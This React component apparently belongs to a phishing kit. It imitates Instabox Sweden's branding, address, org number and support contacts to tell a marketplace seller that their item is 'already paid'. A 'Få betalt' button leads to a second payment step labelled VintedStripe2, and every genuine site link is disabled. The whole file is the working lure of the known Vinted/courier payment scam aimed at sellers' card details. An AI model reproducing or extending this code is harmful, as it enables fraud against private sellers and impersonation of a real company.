import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './InstaboxSeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_WHITE = `${P}/instabox-se-logo-white.svg`;

function noop(e) {
  e.preventDefault();
}

const NAV_LINKS = [
  'Om oss',
  'Hjälp',
  'Våra platser',
  'Spåra paket',
  'Nyheter',
  'Jobb',
  'Retur',
  'Hållbarhet',
];

function WalletIcon() {
  return (
    <svg className="instabox-se-wallet" viewBox="0 0 64 56" fill="none" aria-hidden>
      <path
        d="M8 12h40c4 0 8 3.5 8 8v28c0 4.5-4 8-8 8H12c-4 0-8-3.5-8-8V20c0-4.5 4-8 8-8z"
        stroke="#E6322E"
        strokeWidth="2.5"
        strokeLinejoin="round"
      />
      <path d="M8 20h44" stroke="#E6322E" strokeWidth="2.5" strokeLinecap="round" />
      <path
        d="M44 32h12v8H44c-2.5 0-4-2-4-4s1.5-4 4-4z"
        stroke="#E6322E"
        strokeWidth="2.5"
        strokeLinejoin="round"
      />
      <path
        d="M18 8l-4 4M26 6v6M34 8l4 4"
        stroke="#E6322E"
        strokeWidth="2"
        strokeLinecap="round"
      />
    </svg>
  );
}

/**
 * Instabox (SE) — bekräftelse, CTA → index2 (VintedStripe2).
 */
function InstaboxSeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'SEK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const productVal = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="instabox-se-wrap instabox-se-wrap--loading">
        <div className="instabox-se-loading">Laddar…</div>
        <div className="instabox-se-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="instabox-se-wrap">
      <header className="instabox-se-topbar">
        <div className="instabox-se-topbar-inner">
          <a href="#/" className="instabox-se-brand" onClick={noop}>
            <img src={LOGO_WHITE} alt="Instabox" className="instabox-se-logo-img" width={140} height={28} />
          </a>
          <nav className="instabox-se-nav" aria-label="Huvudmeny">
            {NAV_LINKS.map((label) => (
              <a key={label} href="#/" onClick={noop}>
                {label}
              </a>
            ))}
          </nav>
          <button type="button" className="instabox-se-lang" onClick={noop}>
            English
          </button>
        </div>
      </header>

      <main className="instabox-se-main">
        <div className="instabox-se-card">
          <div className="instabox-se-stepper" aria-hidden>
            <div className="instabox-se-stepper-track">
              <span className="instabox-se-stepper-fill" />
            </div>
            <div className="instabox-se-stepper-labels">
              <span>Produkt</span>
              <span>Adress</span>
              <span>Betalt</span>
              <span>Motta</span>
            </div>
          </div>

          <h1 className="instabox-se-h1">Produkten är redan betald</h1>
          <p className="instabox-se-lead">
            Din vara har betalats. Få pengarna och skicka varan till köparen inom 7 dagar.
          </p>

          <div className="instabox-se-wallet-block">
            <WalletIcon />
            <p className="instabox-se-price-big">{amountLine}</p>
          </div>

          <div className="instabox-se-fields">
            <label className="instabox-se-field">
              <span className="instabox-se-field-cap">Produkt</span>
              <input readOnly value={productVal} className="instabox-se-input" />
            </label>
            <label className="instabox-se-field">
              <span className="instabox-se-field-cap">Köparens namn</span>
              <input readOnly value={buyerName} className="instabox-se-input" />
            </label>
            <label className="instabox-se-field">
              <span className="instabox-se-field-cap">Köparens adress</span>
              <input readOnly value={address} className="instabox-se-input" />
            </label>
          </div>

          <Link to={index2Path} className="instabox-se-cta">
            Få betalt : {amountLine}
          </Link>
        </div>
      </main>

      <footer className="instabox-se-footer">
        <div className="instabox-se-wave" aria-hidden />
        <div className="instabox-se-footer-inner">
          <img src={LOGO_WHITE} alt="" className="instabox-se-footer-logo" width={120} height={24} />

          <div className="instabox-se-footer-cols">
            <div className="instabox-se-footer-col">
              <h3 className="instabox-se-footer-h">Kundservice</h3>
              <p>
                <strong>SMS:</strong> 71020
              </p>
              <p>
                <strong>Ring:</strong> 010-206 90 01
              </p>
              <p>
                <strong>Öppettider</strong>
                <br />
                mån–fre 08:00–21:00
                <br />
                lör–sön 09:00–21:00
              </p>
              <p>
                <strong>E-post:</strong>{' '}
                <a href="mailto:info@instabox.se">info@instabox.se</a>
              </p>
            </div>
            <div className="instabox-se-footer-col">
              <h3 className="instabox-se-footer-h">Adress</h3>
              <p>
                Instabox Sweden AB
                <br />
                Hälsingegatan 40
                <br />
                11343 Stockholm
                <br />
                Org nr: 556831-5393
              </p>
              <p className="instabox-se-footer-links">
                <a href="#/" onClick={noop}>
                  Villkor
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  Integritetspolicy
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  Code of Conduct
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  Visselblåsning
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  Cookies
                </a>
              </p>
            </div>
            <div className="instabox-se-footer-col">
              <h3 className="instabox-se-footer-h">Följ</h3>
              <p className="instabox-se-footer-social">
                <a href="#/" onClick={noop}>
                  Facebook
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  Instagram
                </a>
                {' · '}
                <a href="#/" onClick={noop}>
                  LinkedIn
                </a>
              </p>
              <button type="button" className="instabox-se-app-btn" onClick={noop}>
                Prova vår app
              </button>
            </div>
          </div>

          <div className="instabox-se-footer-bottom">
            <div className="instabox-se-heart-i" aria-hidden>
              i
            </div>
            <button type="button" className="instabox-se-country" onClick={noop}>
              <span className="instabox-se-flag" aria-hidden>
                🇸🇪
              </span>{' '}
              Sverige
            </button>
          </div>
        </div>
      </footer>

      <div className="instabox-se-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default InstaboxSeSuccess;
